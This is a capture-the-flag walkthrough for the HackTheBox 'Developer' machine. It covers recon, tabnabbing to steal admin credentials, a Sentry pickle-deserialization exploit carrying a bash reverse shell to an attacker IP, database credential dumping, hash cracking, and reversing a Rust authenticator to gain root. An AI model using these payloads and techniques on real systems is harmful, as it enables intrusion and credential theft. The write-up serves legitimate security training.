HackTheBox – Developer Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -p- -T4 10.10.11.103
output: 22, 80
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -sC -sV -p22,80 10.10.11.103
http://developer.htb
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-words.txt -u http://developer.htb
http://developer.htb/accounts/signup/
┌──(rootkali)-[/home/kali/Downloads]
└─# unzip phished_list.zip
┌──(rootkali)-[/home/kali/Downloads]
└─# unzip phished_credentials.xlsx
we get the flag with a quick grep
command for a common flag scheme.
┌──(rootkali)-[/home/kali/Downloads]
└─# grep -iRe ‘{.*}’
Flag: DHTB{H1dD3N_C0LuMn5_FtW}
Going to our profile we see that we now have a walkthrough submited. Checking the source of the page for the link we see that clicking on it opens a new tab with target="_blank"
. This makes it susceptible to tabnabbing since we can change the parent page of the tab.
After about a minute we get a hit on our listener with the user agent of firefox, which means it is probably checked using a browser.
┌──(rootkali)-[/home/kali/Downloads]
└─# python3 -m http.server 80
┌──(rootkali)-[/home/kali/Downloads]
└─# python3 -m http.server
┌──(rootkali)-[/home/kali/Downloads]
└─# tcpdump -i tun0 -nt -A
Link of walkthrough : http://10.10.14.55/evil.html
On tcpdump we get this.
Voila, the credentials are (admin:SuperSecurePassword@HTB2021
). Armed with the credentials, we can now log in to Django administration.
http://developer.htb/admin/login/?next=/admin/
Here click on sites we can see Django is running 2 sites.
I’d better include developer-sentry.developer.htb
into /etc/hosts
as well. This is what the Sentry site looks like.
http://developer-sentry.developer.htb/auth/login/sentry/
Click on member.
We can see that jacob@developer.htb
is a member of the site. Perhaps the password SuperSecurePassword@HTB2021
will work for this username as well?
Authenticated Remote Code Execution in Sentry
The first thing I notice is that this Sentry is old. The current Sentry release is 21.8.0!!!
Oh boy have I the right exploit for this. The following Python code will help to generate the poisonous pickle for deserialization in the data field of an audit log entry.
https://www.exploit-db.com/exploits/50318
https://doc.lagout.org/Others/synacktiv_advisory_sentry_pickle.pdf
┌──(rootkali)-[/home/kali/Downloads]
└─# python2 exploit.py “/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.55/1234 0>&1′”
Output:
eJwVi0EKgCAQAO/7Ck/pJVdTO/qGqBeoCQVRS1bvT2EOw8Ck8ka6r5RLgemifAJpEOKgARaOcT8xhrJxIANh4X2qZpu1yvqd+Y7hmj98EqFWsmGlc6gHY5nyna6Dg/DMNIL8AejnHXE=
http://developer-sentry.developer.htb/admin/sentry/auditlogentry/add/
Hit Save and you’ll see your shell.
www-data@developer:/var/sentry$ cd /etc
www-data@developer:/etc$ cd sentry
www-data@developer:/etc/sentry$ cat sentry.conf.py
www-data@developer:/etc/sentry$ psql sentry sentry -h localhost –W
password : SentryPassword2021
\d+
select * from auth_user;
Since karl is the admin and also a user on the machine we try to crack his password hash with hashcat first and are successful.
┌──(rootkali)-[/home/kali/Downloads]
└─# hashcat -m 10000 -O hash rockyou.txt
Password: insaneclownposse
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh karl@developer.htb
karl@developer:~$ file /root/.auth/authenticator
┌──(rootkali)-[/home/kali/Downloads/test]
└─# scp karl@developer.htb:/root/.auth/authenticator .
https://github.com/pwndbg/pwndbg
┌──(rootkali)-[/home/kali/Downloads/test]
└─# gdb authenticator
pwndbg> start
pwndbg> b *0x55555555bfec
pwndbg> c
pwndbg> s
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
In above we copy this address
0x555555582df0
Coming back to password prompt and put 123456
Now delete all the previous set break points
pwndbg> d br
pwndbg> b *0x555555582df0
Now run once again
pwndbg> r
pwndbg> c
Here simply press enter
pwndbg> r
pwndbg> s
Address : 0x55555555b204
Now again delete the break point
pwndbg> d br
pwndbg> b *0x55555555b204
pwndbg> r
pwndbg> s
pwndbg> n
pwndbg> d br
pwndbg> b *0x55555555b231
pwndbg> r
Just to go this fuction use this ‘s’
pwndbg> s
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
Now finally we can see the call function
But nothing interesting so we continue to explore for another call function as in this call function we can see rbx is pointing register but nothing interesting in rbx
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
Here we can see something interesting like this in call std::io::stdio::Stdin::read_line>
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> d br
pwndbg> b *0x55555555b876
pwndbg> r
pwndbg> s
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
pwndbg> n
Concentrate on <crypto::aes::ctr> of the call
Here we can see crypto show aes
pwndbg> d br
pwndbg> b *0x55555555b936
pwndbg> r
Once we put the password as 123456
Now all register having some value. Now we try to check the hex value
pwndbg> hex $rax
pwndbg> hex $rcx
pwndbg> hex $rsi
Search : cyberchef aes
Now we know crypto is aes and mode is ctr
these are the inputs
AES Encrypt:
a3 e8 32 34 5c 79 91 61 9e 20 d4 3d be f4 f5 d5
KEY:
76 1f 59 e3 d9 d2 95 9a a7 98 55 dc 06 20 81 6a
Input:
fe 1b 25 f0 80 6a 97 ca 78 80 fd 58 fc 5c 20 23 6c a2 db d0 e5 02 b5 fa eb c0 af 3a 9f 27 15 2c
Here we get the output as “RustForSecurity@Developer@2021:)”
Key:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2v26M3NL+LBT+e2ff66roKpi/4BdOypxaAr4dJ6pV7DCTmj3Hn4hutxOZttIhI/YdMZ4/FSRO5NkVDC6dE4KZ/0e/QzK9lc7l5zibpUqX1o2nk76BjOX1B+rciRS+MGNhWphAemTol3DPNv3+XUOvviByADThAnSo3uexy1BtBR3EsqTnOpYi3MJR4PVuPmh2MwQ6sjMCsHHONTjP9S2n6Mo91uch7xszM2kVuwhvjlDXQ00WU8HkGFlWcKNWyhhESOKLakebhFSQPMdY4LVDYTS2iQV7vnRyQMoAhkHW+io0cGhWxSSuSiw0fF3fnoAbPFQYU5ip3tZXjCG0y057m/peFCuU+ZF4LnR3138RaEsDW+zeooNJ5wXdB/IfiHqXrf/dnSmlZAF8g+4Jo1oXXuFc1GDHyRu42UaDDhJvL7D1sliB2AsOJb2S/0e4uWYowZDLGbuH7mHfAT1RQlp7Jl97a5K732XTkGGtGglCmH7YyG3ej8m7nf0SQdi8Hlk= root@kali
karl@developer:~$ sudo /root/.auth/authenticator
Enter your password to access the super user:
RustForSecurity@Developer@2021:)
Enter your SSH public key in now:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2v26M3NL+LBT+e2ff66roKpi/4BdOypxaAr4dJ6pV7DCTmj3Hn4hutxOZttIhI/YdMZ4/FSRO5NkVDC6dE4KZ/0e/QzK9lc7l5zibpUqX1o2nk76BjOX1B+rciRS+MGNhWphAemTol3DPNv3+XUOvviByADThAnSo3uexy1BtBR3EsqTnOpYi3MJR4PVuPmh2MwQ6sjMCsHHONTjP9S2n6Mo91uch7xszM2kVuwhvjlDXQ00WU8HkGFlWcKNWyhhESOKLakebhFSQPMdY4LVDYTS2iQV7vnRyQMoAhkHW+io0cGhWxSSuSiw0fF3fnoAbPFQYU5ip3tZXjCG0y057m/peFCuU+ZF4LnR3138RaEsDW+zeooNJ5wXdB/IfiHqXrf/dnSmlZAF8g+4Jo1oXXuFc1GDHyRu42UaDDhJvL7D1sliB2AsOJb2S/0e4uWYowZDLGbuH7mHfAT1RQlp7Jl97a5K732XTkGGtGglCmH7YyG3ej8m7nf0SQdi8Hlk= root@kali
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i /root/.ssh/id_rsa root@developer.htb